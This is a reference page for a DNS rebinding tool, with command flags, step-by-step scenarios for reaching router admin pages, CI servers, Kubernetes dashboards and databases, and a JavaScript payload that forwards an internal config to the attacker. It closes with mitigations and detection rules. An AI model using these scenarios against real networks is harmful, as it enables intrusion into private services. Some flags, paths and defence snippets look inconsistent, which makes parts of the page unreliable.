Rebind
Overview
Seção intitulada “Overview”Rebind is a specialized security testing tool for demonstrating DNS rebinding vulnerabilities. DNS rebinding is a client-side attack technique where an attacker tricks a victim’s browser into accessing an internal network resource by manipulating DNS responses. Used by security professionals for authorized penetration testing, vulnerability assessment, and defensive security research.
Installation
Seção intitulada “Installation”Debian/Ubuntu
Seção intitulada “Debian/Ubuntu”sudo apt-get update
sudo apt-get install rebindKali Linux (Pre-installed)
Seção intitulada “Kali Linux (Pre-installed)”which rebind
rebind --versionFrom Source
Seção intitulada “From Source”git clone https://github.com/iceadzcom/rebind.git
cd rebind
make
sudo make installVerify Installation
Seção intitulada “Verify Installation”rebind -h
rebind --versionBasic Syntax
Seção intitulada “Basic Syntax”rebind [options] [target]
rebind -h # Help menu
rebind --version # Version info
rebind -l <ip> # Listen on IP address
rebind -p <port> # Specify port (default: 53)Essential Commands
Seção intitulada “Essential Commands”| Command | Purpose |
|---|---|
rebind -l 127.0.0.1 | Listen on localhost |
rebind -l 0.0.0.0 -p 5353 | Listen on all interfaces, custom port |
rebind --domain example.com | Set target domain |
rebind --ip 192.168.1.100 | Specify rebind target IP |
rebind --delay 2 | Delay between DNS responses (seconds) |
rebind --ttl 0 | Set TTL (Time-To-Live) value |
rebind --records A,AAAA | Specify record types |
rebind -v | Verbose output |
rebind --log file.log | Log DNS queries |
rebind --config config.yaml | Load configuration file |
DNS Rebinding Concepts
Seção intitulada “DNS Rebinding Concepts”Attack Flow
Seção intitulada “Attack Flow”1. Attacker owns malicious domain: attacker.com
2. Victim visits: http://attacker.com/payload
3. JavaScript on page queries: internal.local
4. First DNS response: returns attacker's IP (domain hosted)
5. Browser makes connection to attacker's server
6. Second DNS response: returns internal IP (192.168.1.1)
7. Browser repeats request, now to internal IP (same origin!)
8. Access internal service: router admin, internal APIs, etc.Configuration Setup
Seção intitulada “Configuration Setup”Basic Configuration
Seção intitulada “Basic Configuration”rebind -l 127.0.0.1 -p 53Custom Port (if 53 restricted)
Seção intitulada “Custom Port (if 53 restricted)”rebind -l 192.168.1.100 -p 5353Configuration File
Seção intitulada “Configuration File”# rebind.yaml
listen:
address: 0.0.0.0
port: 53
domain:
name: vulnerable.local
ttl: 0
rebind:
external_ip: 203.0.113.1
internal_ip: 192.168.1.1
delay: 2
logging:
verbose: true
logfile: /var/log/rebind.logCommand Examples
Seção intitulada “Command Examples”Listen on Default Interface
Seção intitulada “Listen on Default Interface”rebind -l 192.168.1.100Multiple Domain Rebinding
Seção intitulada “Multiple Domain Rebinding”rebind -l 0.0.0.0 --domain attacker.com --domain internal.localCustom TTL and Delay
Seção intitulada “Custom TTL and Delay”rebind -l 127.0.0.1 --ttl 0 --delay 1Verbose Logging
Seção intitulada “Verbose Logging”rebind -l 192.168.1.100 -v --log /tmp/rebind.logHigh-Precision Timing
Seção intitulada “High-Precision Timing”rebind -l 0.0.0.0 --delay 0.5 --ttl 1DNS Response Manipulation
Seção intitulada “DNS Response Manipulation”Return Different IPs Alternately
Seção intitulada “Return Different IPs Alternately”# First query: external IP
# Second query: internal IP
rebind -l 192.168.1.100 \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.1Wildcard Domain Responses
Seção intitulada “Wildcard Domain Responses”# All subdomains return rebind IP
rebind -l 192.168.1.100 --wildcardRound-Robin DNS
Seção intitulada “Round-Robin DNS”rebind -l 192.168.1.100 \
--ip 192.168.1.50 \
--ip 192.168.1.51 \
--ip 192.168.1.52Client Configuration
Seção intitulada “Client Configuration”Redirect System DNS
Seção intitulada “Redirect System DNS”# For testing, redirect to rebind server
echo "nameserver 192.168.1.100" | sudo tee /etc/resolv.conf.d/rebind
# Or use dig to test:
dig @192.168.1.100 vulnerable.local
dig @192.168.1.100 vulnerable.local +shortTest DNS Resolution
Seção intitulada “Test DNS Resolution”# Verify DNS responses
nslookup vulnerable.local 192.168.1.100
dig @192.168.1.100 vulnerable.local
host vulnerable.local 192.168.1.100Attack Scenarios
Seção intitulada “Attack Scenarios”Router Admin Access
Seção intitulada “Router Admin Access”# 1. Start rebind server targeting 192.168.1.1
rebind -l 192.168.1.100 \
--domain vulnerable.local \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.1
# 2. Redirect DNS to attacker's rebind server
# 3. Victim visits: http://vulnerable.local/admin
# 4. JavaScript rebinds to 192.168.1.1 (router admin)
# 5. Can access router config without authenticationInternal API Access
Seção intitulada “Internal API Access”# Rebind to internal API server
rebind -l 192.168.1.100 \
--domain api.internal \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.50
# Access internal APIs from browser context
curl http://api.internal/internal-serviceDatabase Server Exposure
Seção intitulada “Database Server Exposure”# Expose internal database to browser
rebind -l 192.168.1.100 \
--domain dbserver.internal \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.200 \
--port 5432JavaScript Exploitation
Seção intitulada “JavaScript Exploitation”Rebinding Payload
Seção intitulada “Rebinding Payload”// Victim's browser executes this
fetch('http://vulnerable.local/admin')
.then(r => r.text())
.then(html => {
// First request goes to attacker
// Browser caches: vulnerable.local = 203.0.113.1
console.log('Attacker sees request');
});
// After DNS rebind occurs...
setTimeout(() => {
fetch('http://vulnerable.local/config')
.then(r => r.json())
.then(config => {
// Second request goes to internal IP (192.168.1.1)
// Due to DNS rebinding vulnerability
sendToAttacker(config);
});
}, 2000);CORS Bypass Via Rebinding
Seção intitulada “CORS Bypass Via Rebinding”// Normally blocked by CORS policy
// Rebinding makes it appear same-origin
const req = new XMLHttpRequest();
req.open('GET', 'http://router-admin.local/config');
req.onload = () => {
// Access internal data through rebinding
console.log(req.responseText);
};
req.send();Monitoring and Logging
Seção intitulada “Monitoring and Logging”Enable Verbose Logging
Seção intitulada “Enable Verbose Logging”rebind -l 192.168.1.100 -v 2>&1 | tee rebind.logMonitor DNS Queries in Real-Time
Seção intitulada “Monitor DNS Queries in Real-Time”# Terminal 1: Start rebind
rebind -l 192.168.1.100 -v
# Terminal 2: Watch queries
tail -f rebind.log | grep "QUERY\|RESPONSE"Tcpdump Analysis
Seção intitulada “Tcpdump Analysis”# Capture DNS traffic
sudo tcpdump -i eth0 'udp port 53' -A
# Or filter for specific domain
sudo tcpdump -i eth0 'udp port 53 and (host attacker.com)' -AAdvanced Techniques
Seção intitulada “Advanced Techniques”Chained Rebinding
Seção intitulada “Chained Rebinding”# Rebind multiple times for complex attacks
rebind -l 192.168.1.100 \
--chain \
--ips 203.0.113.1,192.168.1.1,192.168.1.50Timing-Based Rebinding
Seção intitulada “Timing-Based Rebinding”# Precise timing for connection reuse
rebind -l 192.168.1.100 \
--delay 0.1 \
--ttl 1 \
--timing-preciseHTTP/HTTPS Interception
Seção intitulada “HTTP/HTTPS Interception”# Rebind for both HTTP and HTTPS
rebind -l 192.168.1.100 \
--http --https \
--certificate cert.pem \
--key key.pemDefensive Testing
Seção intitulada “Defensive Testing”Test Router Vulnerability
Seção intitulada “Test Router Vulnerability”# Check if router blocks internal DNS rebinding
rebind -l 192.168.1.100 --domain router-admin.local
# Try to access: http://router-admin.local/
# If successful = vulnerableApplication CORS Testing
Seção intitulada “Application CORS Testing”# Test if application validates origin properly
rebind -l 192.168.1.100 \
--domain vulnerable-app.local \
--internal-ip 192.168.1.50
# Check if app accepts requests from rebind domainMicroservice Exposure
Seção intitulada “Microservice Exposure”# Identify exposed internal services
rebind -l 192.168.1.100 --scan-network 192.168.1.0/24Common Targets
Seção intitulada “Common Targets”Home Router Admin
Seção intitulada “Home Router Admin”# Gateway: 192.168.1.1
rebind -l 192.168.1.100 \
--domain gateway.local \
--internal-ip 192.168.1.1 \
--port 80Local Jenkins/CI
Seção intitulada “Local Jenkins/CI”# Jenkins typically on 8080
rebind -l 192.168.1.100 \
--domain jenkins.local \
--internal-ip 192.168.1.50 \
--port 8080Kubernetes Dashboard
Seção intitulada “Kubernetes Dashboard”# K8s dashboard on 10.0.0.1:8001
rebind -l 192.168.1.100 \
--domain k8s-dashboard.local \
--internal-ip 10.0.0.1 \
--port 8001Docker Registry
Seção intitulada “Docker Registry”# Private registry on 5000
rebind -l 192.168.1.100 \
--domain registry.local \
--internal-ip 192.168.1.200 \
--port 5000Network Configuration
Seção intitulada “Network Configuration”Iptables Forwarding
Seção intitulada “Iptables Forwarding”# Forward DNS queries to rebind
sudo iptables -t nat -A PREROUTING \
-p udp --dport 53 \
-j DNAT --to-destination 192.168.1.100:53
# Or for testing:
sudo iptables -t nat -A PREROUTING \
-p udp --dport 5353 \
-j DNAT --to-destination 192.168.1.100:5353Redirect DNS (Alternative)
Seção intitulada “Redirect DNS (Alternative)”# Using dnsmasq
echo "address=/vulnerable.local/192.168.1.100" | sudo tee /etc/dnsmasq.conf
sudo systemctl restart dnsmasqBatch Testing
Seção intitulada “Batch Testing”Test Multiple Domains
Seção intitulada “Test Multiple Domains”#!/bin/bash
targets=(
"router-admin.local:192.168.1.1"
"jenkins.local:192.168.1.50"
"registry.local:192.168.1.200"
)
for target in "${targets[@]}"; do
domain=$(echo $target | cut -d: -f1)
ip=$(echo $target | cut -d: -f2)
echo "Testing: $domain -> $ip"
rebind -l 192.168.1.100 \
--domain "$domain" \
--internal-ip "$ip" \
--delay 2 &
sleep 5
killall rebind
doneAutomated Scanning
Seção intitulada “Automated Scanning”#!/bin/bash
# Scan network for rebinding-vulnerable services
for ip in 192.168.1.{1..254}; do
timeout 1 bash -c "echo > /dev/tcp/$ip/80" 2>/dev/null && \
echo "Host $ip:80 open - testing rebind..."
doneTroubleshooting
Seção intitulada “Troubleshooting”Port 53 Access Denied
Seção intitulada “Port 53 Access Denied”# Run with sudo for port 53
sudo rebind -l 0.0.0.0 -p 53
# Or use unprivileged port
rebind -l 0.0.0.0 -p 5353DNS Not Resolving
Seção intitulada “DNS Not Resolving”# Verify DNS server is running
sudo netstat -ulpn | grep 53
# Test query
dig @127.0.0.1 vulnerable.local
# Check firewall
sudo ufw allow 53/udpRebinding Not Triggering
Seção intitulada “Rebinding Not Triggering”# Check TTL settings
rebind -l 192.168.1.100 --ttl 0
# Verify timing
rebind -l 192.168.1.100 --delay 1 --ttl 1 -v
# Monitor with tcpdump
sudo tcpdump -i eth0 'udp port 53' -ABest Practices
Seção intitulada “Best Practices”- Obtain Authorization - Only test systems you own or have written permission to test
- Document Network - Map internal network topology before testing
- Isolate Testing - Conduct testing in controlled lab environments
- Log All Activity - Enable verbose logging for incident response review
- Verify Defenses - Confirm mitigation before declaring success
- Clean Up - Remove all rebind configurations after testing
- Report Findings - Document vulnerable systems and remediation
- Understand Risks - DNS rebinding can disrupt network services
Mitigation Strategies
Seção intitulada “Mitigation Strategies”Router-Level Defenses
Seção intitulada “Router-Level Defenses”# Configure router DNS guards
# Set DNS rebinding protection: ON
# Block local DNS names: ENABLEDApplication-Level Defenses
Seção intitulada “Application-Level Defenses”// Validate origin header
if (req.headers.origin !== ALLOWED_ORIGIN) {
return res.status(403).json({error: 'Invalid origin'});
}
// Validate Host header
if (req.hostname !== 'internal-api.local') {
return res.status(403).json({error: 'Invalid host'});
}Browser Security
Seção intitulada “Browser Security”// Check document.domain for rebinding
if (document.domain !== TRUSTED_DOMAIN) {
throw new Error('Domain validation failed');
}Real-World Detection
Seção intitulada “Real-World Detection”IDS Signature
Seção intitulada “IDS Signature”# Look for multiple DNS responses to same domain
alert dns any any -> any any (
msg:"DNS Rebinding Attack";
dns.query;
content:"vulnerable.local";
threshold: type different, track by_src, count 2, seconds 5;
)Web Application Firewall
Seção intitulada “Web Application Firewall”# Block suspicious origin headers
SecRule REQUEST_HEADERS:Origin "^http://.*\.local" \
"id:1001,phase:2,deny,status:403"Additional Resources
Seção intitulada “Additional Resources”- DNS Rebinding Research: https://en.wikipedia.org/wiki/DNS_rebinding
- OWASP DNS Rebinding: https://owasp.org/www-community/attacks/DNS_Rebinding
- Rebind GitHub: https://github.com/iceadzcom/rebind
- Browser Security Docs: https://developer.mozilla.org/en-US/docs/Web/Security